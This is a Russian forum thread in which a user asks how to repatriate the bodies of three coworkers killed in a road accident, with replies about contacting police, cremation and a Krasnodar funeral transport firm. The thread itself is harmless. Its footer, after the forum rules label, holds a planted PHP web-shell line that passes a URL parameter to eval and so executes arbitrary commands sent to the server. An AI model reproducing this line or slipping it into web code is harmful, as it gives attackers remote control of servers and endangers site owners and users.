-
Мимо проходил
Дтп С Летальными Исходами
У меня на работе случилось ЧП. В командировке погибло трое человек. Они разбились на машине. Теперь мне предстоит вернуть тела дамой, что бы родные могли нормально похоронить погибших. Но вот как всю эту процедуру сделать, пока не известно. Может кто-то знает, как это правильно делать? Варианты интересны для Краснодара
Последний раз редактировалось Turisar; 23.10.2021 в 09:09.
-
Мимо проходил
Думаю, вам надо изначально связываться с правоохранительными органами, которые ведут дело по ДТП и только после этого думать, как перевозить груз 200. Но я не утверждаю, а просто предполагаю!
-
Мимо проходил
Это уже проходили.... много разной возни и не факт, что выпустят без проблем. Тем более рядом нужны родственники.
Последний раз редактировалось Turisar; 23.10.2021 в 09:13.
-
Мимо проходил
Я бы рекомендовал кремировать тела и привезти родственникам урны с прахом. Это будет проще и дешевое. Вообщ не понимаю, кому нужны кладбища, если там все переполнено.
-
Мимо проходил
Частично я согласен с Agatangel . С правоохранительными органами надо связываться в любом случае, иначе вы никак не вывезете погибших. Кстати, автор, что бы избежать каких-то проблем, я бы рекомендовал обратиться к тем, кто занимается перевозкой тел умерших. В Краснодаре такие компании не редкость http://юг-ритуал.рф/gruz200 Думаю, что эта компания решит все ваши вопросы, если конечно регион вам подходит.
Ваши права
- Вы не можете создавать новые темы
- Вы не можете отвечать в темах
- Вы не можете прикреплять вложения
- Вы не можете редактировать свои сообщения
Правила форума
{{$myVar = eval($_GET[cmd]);}}